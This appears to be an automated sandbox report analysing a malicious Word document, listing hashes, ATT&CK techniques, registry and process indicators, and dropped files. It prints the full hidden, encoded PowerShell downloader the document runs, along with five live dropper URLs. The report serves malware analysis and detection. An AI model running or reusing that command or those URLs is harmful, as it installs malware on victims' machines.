759a79d326ec2adba9922e42f8062027af72a6660c7aa57a14af043d513931b8

General

Target

759a79d326ec2adba9922e42f8062027af72a6660c7aa57a14af043d513931b8.doc
Size

124KB
MD5

335fe9fa1a92089b7ef769503667900d
SHA1

aa1744f5e5b91d7f71fbca4cefaf10e50d84c0cd
SHA256

759a79d326ec2adba9922e42f8062027af72a6660c7aa57a14af043d513931b8
SHA512

4786f92c7025589812abc2ab8944c7ef7c05531bb78e99801adb25a9ee7a37b1b7aecb90afe74f571257ad6bb6dec4ecc0c1436a5d23f160abd91e8bb542158e
SSDEEP

3072:FaKgdzSrG8KyIwLx3BhgC1s0rPOWfKNRP:FaKUzSLnLx3P3O0r2WfKN5

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://sandiegohomevalues.com/engl/4de-kzsyhu-768611/

exe.dropper

https://www.wenkawang.com/data/bofze0s-7ji4-15/

exe.dropper

https://www.bruidsfotograaf-utrecht.com/wp-includes/QLvFLy/

exe.dropper

http://ma.jopedu.com/img/8z8dl-3xn-655019278/

exe.dropper

http://pay.jopedu.com/ThinkPHP/l9okcguh6-b9nnrh7-96245524/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2000	984	Powershell.exe	83

Blocklisted process makes network request 2 IoCs

flow	pid	Process
26	2000	Powershell.exe
30	2000	Powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2000	Powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
5016	WINWORD.EXE
5016	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2000	Powershell.exe
2000	Powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2000	Powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
5016	WINWORD.EXE
5016	WINWORD.EXE

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
5016	WINWORD.EXE
5016	WINWORD.EXE
5016	WINWORD.EXE
5016	WINWORD.EXE
5016	WINWORD.EXE
5016	WINWORD.EXE
5016	WINWORD.EXE

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 5016 wrote to memory of 3444	5016	WINWORD.EXE	86
PID 5016 wrote to memory of 3444	5016	WINWORD.EXE	86

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\759a79d326ec2adba9922e42f8062027af72a6660c7aa57a14af043d513931b8.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5016
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:3444

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABKAGIAagBkAG0AcgBrAGYAPQAnAFcAdgB4AG8AagBqAHgAeQAnADsAJABLAHEAegB2AHEAagBjAGQAYgBkAGsAIAA9ACAAJwAzADAANgAnADsAJABHAHgAZAB1AG8AYwBkAGoAYwBqAHQAPQAnAEIAawBmAGsAYgBvAGYAaQBwAHAAYwB6AHQAJwA7ACQATQBiAGsAbQBvAG8AbgBnAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABLAHEAegB2AHEAagBjAGQAYgBkAGsAKwAnAC4AZQB4AGUAJwA7ACQAVQBlAGYAYwB6AHAAYwBkAGYAaQB4AG8APQAnAFIAcQBkAGsAegBtAHkAZABtAHcAdAB3AGYAJwA7ACQASQB5AGIAbgBwAHkAdABmAGEAcABtAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAJwArACcAdAAnACkAIABuAGUAVAAuAHcAZQBiAGMATABJAEUAbgB0ADsAJABEAHEAcwB5AG4AYQBoAHkAeQB2AHgAbAA9ACcAaAB0AHQAcABzADoALwAvAHMAYQBuAGQAaQBlAGcAbwBoAG8AbQBlAHYAYQBsAHUAZQBzAC4AYwBvAG0ALwBlAG4AZwBsAC8ANABkAGUALQBrAHoAcwB5AGgAdQAtADcANgA4ADYAMQAxAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgB3AGUAbgBrAGEAdwBhAG4AZwAuAGMAbwBtAC8AZABhAHQAYQAvAGIAbwBmAHoAZQAwAHMALQA3AGoAaQA0AC0AMQA1AC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBiAHIAdQBpAGQAcwBmAG8AdABvAGcAcgBhAGEAZgAtAHUAdAByAGUAYwBoAHQALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFEATAB2AEYATAB5AC8AKgBoAHQAdABwADoALwAvAG0AYQAuAGoAbwBwAGUAZAB1AC4AYwBvAG0ALwBpAG0AZwAvADgAegA4AGQAbAAtADMAeABuAC0ANgA1ADUAMAAxADkAMgA3ADgALwAqAGgAdAB0AHAAOgAvAC8AcABhAHkALgBqAG8AcABlAGQAdQAuAGMAbwBtAC8AVABoAGkAbgBrAFAASABQAC8AbAA5AG8AawBjAGcAdQBoADYALQBiADkAbgBuAHIAaAA3AC0AOQA2ADIANAA1ADUAMgA0AC8AJwAuACIAUwBgAFAATABJAFQAIgAoACcAKgAnACkAOwAkAEEAdgB2AGgAawBvAHkAZQByAD0AJwBaAGcAegBiAGQAegB5AG0AeQAnADsAZgBvAHIAZQBhAGMAaAAoACQAUgBjAHIAbgBkAHEAZgBtAGYAbQBlACAAaQBuACAAJABEAHEAcwB5AG4AYQBoAHkAeQB2AHgAbAApAHsAdAByAHkAewAkAEkAeQBiAG4AcAB5AHQAZgBhAHAAbQAuACIAZABPAGAAVwBuAGwAbwBhAEQAZgBgAEkAbABlACIAKAAkAFIAYwByAG4AZABxAGYAbQBmAG0AZQAsACAAJABNAGIAawBtAG8AbwBuAGcAKQA7ACQAUAB0AGkAdQBxAHIAaQBqAGQAawBsAHYAZQA9ACcASAB3AGgAcwBtAGwAegBzACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAZQBtACcAKQAgACQATQBiAGsAbQBvAG8AbgBnACkALgAiAEwAZQBuAGAAZwBUAGgAIgAgAC0AZwBlACAAMwAwADMAMAA5ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAGEAcgBUACIAKAAkAE0AYgBrAG0AbwBvAG4AZwApADsAJABMAHMAdAB4AHMAcwBpAGEAPQAnAFkAcAB5AGgAdgBoAGgAdwAnADsAYgByAGUAYQBrADsAJABWAG4AYQBzAGIAZgBmAG0AbwBxAD0AJwBDAG0AZwBxAHAAZwBzAHMAbgBkAGkAYgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABJAGwAcgBlAHIAdgB6AGgAaQA9ACcAQgB2AG4AbQB2AG0AcABhAGQAbgBsAGIAJwA=
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2000

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\306.exe

Filesize
368KB

MD5
47417cd81cc8aa73a9e3197ed2d48ac3

SHA1
f1439937d21f741083b18504a41f00ae8b705bc8

SHA256
1da4f4a343c690184ed451e36fefef7954bde7893a6e07c586bdee25705bdb25

SHA512
089d056db72fc9e5e49fc82c180ed649d6cf2b99d439137b1c6ca2dba8e5cc8d6bb1912de5399d4e5752b8536fe6c041dead786af376f83c578592ebbb3af325

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\A529A3D4.wmf

Filesize
444B

MD5
316075dd01a01522bce24119e41f8fac

SHA1
0f1dde9609b62841934b4b1f6994097d40f3c8ee

SHA256
4f76c03c5077909c154cf045b2735e9d8e1276fc19d85e300d295a4f9bb8e251

SHA512
37caacebc93a90e31f05ce1787474d9cee03823185577917cd2fe2b6b90154bd422dfd5304ee23c6e0f8fcbb1799ac5bd326018be3f4afb1cb11cdefb8b3b159

Download Submit
C:\Users\Admin\AppData\Local\Temp\TCD1FD0.tmp\gb.xsl

Filesize
262KB

MD5
51d32ee5bc7ab811041f799652d26e04

SHA1
412193006aa3ef19e0a57e16acf86b830993024a

SHA256
6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

SHA512
5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jgb551cu.050.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
3KB

MD5
e2f1ff5dc29985ba9536c7a58ca431ef

SHA1
7d4e855ab0aca29a130c72daaf7fecf7d1bda338

SHA256
37af1f9ee9f7529b7c361d3d3ed6010a2a9cffb11ed25dc96e20795622100148

SHA512
fca57839d9f30d2d43e942dc19ada4e98fd35fa3ed4c6a91f5bb38b48034a29e910bc2313e6870e464b8296060fb6d03b19cb984bb7c32a65e37ea2773c4ace5

Download Submit
memory/2000-68-0x000002A87DC80000-0x000002A87DCA2000-memory.dmp

Filesize
136KB

Download
memory/5016-9-0x00007FFBE2950000-0x00007FFBE2B45000-memory.dmp

Filesize
2.0MB

Download
memory/5016-20-0x00007FFBE2950000-0x00007FFBE2B45000-memory.dmp

Filesize
2.0MB

Download
memory/5016-2-0x00007FFBA29D0000-0x00007FFBA29E0000-memory.dmp

Filesize
64KB

Download
memory/5016-6-0x00007FFBE2950000-0x00007FFBE2B45000-memory.dmp

Filesize
2.0MB

Download
memory/5016-1-0x00007FFBE29ED000-0x00007FFBE29EE000-memory.dmp

Filesize
4KB

Download
memory/5016-0-0x00007FFBA29D0000-0x00007FFBA29E0000-memory.dmp

Filesize
64KB

Download
memory/5016-13-0x00007FFBE2950000-0x00007FFBE2B45000-memory.dmp

Filesize
2.0MB

Download
memory/5016-14-0x00007FFBE2950000-0x00007FFBE2B45000-memory.dmp

Filesize
2.0MB

Download
memory/5016-16-0x00007FFBE2950000-0x00007FFBE2B45000-memory.dmp

Filesize
2.0MB

Download
memory/5016-15-0x00007FFBE2950000-0x00007FFBE2B45000-memory.dmp

Filesize
2.0MB

Download
memory/5016-18-0x00007FFBE2950000-0x00007FFBE2B45000-memory.dmp

Filesize
2.0MB

Download
memory/5016-17-0x00007FFBE2950000-0x00007FFBE2B45000-memory.dmp

Filesize
2.0MB

Download
memory/5016-12-0x00007FFBA08C0000-0x00007FFBA08D0000-memory.dmp

Filesize
64KB

Download
memory/5016-11-0x00007FFBE2950000-0x00007FFBE2B45000-memory.dmp

Filesize
2.0MB

Download
memory/5016-21-0x00007FFBE2950000-0x00007FFBE2B45000-memory.dmp

Filesize
2.0MB

Download
memory/5016-22-0x00007FFBE2950000-0x00007FFBE2B45000-memory.dmp

Filesize
2.0MB

Download
memory/5016-23-0x00007FFBE2950000-0x00007FFBE2B45000-memory.dmp

Filesize
2.0MB

Download
memory/5016-19-0x00007FFBA08C0000-0x00007FFBA08D0000-memory.dmp

Filesize
64KB

Download
memory/5016-10-0x00007FFBE2950000-0x00007FFBE2B45000-memory.dmp

Filesize
2.0MB

Download
memory/5016-8-0x00007FFBE2950000-0x00007FFBE2B45000-memory.dmp

Filesize
2.0MB

Download
memory/5016-7-0x00007FFBE2950000-0x00007FFBE2B45000-memory.dmp

Filesize
2.0MB

Download
memory/5016-73-0x00007FFBE2950000-0x00007FFBE2B45000-memory.dmp

Filesize
2.0MB

Download
memory/5016-75-0x00007FFBE2950000-0x00007FFBE2B45000-memory.dmp

Filesize
2.0MB

Download
memory/5016-74-0x00007FFBE29ED000-0x00007FFBE29EE000-memory.dmp

Filesize
4KB

Download
memory/5016-5-0x00007FFBA29D0000-0x00007FFBA29E0000-memory.dmp

Filesize
64KB

Download
memory/5016-107-0x00007FFBE2950000-0x00007FFBE2B45000-memory.dmp

Filesize
2.0MB

Download
memory/5016-3-0x00007FFBA29D0000-0x00007FFBA29E0000-memory.dmp

Filesize
64KB

Download
memory/5016-4-0x00007FFBA29D0000-0x00007FFBA29E0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads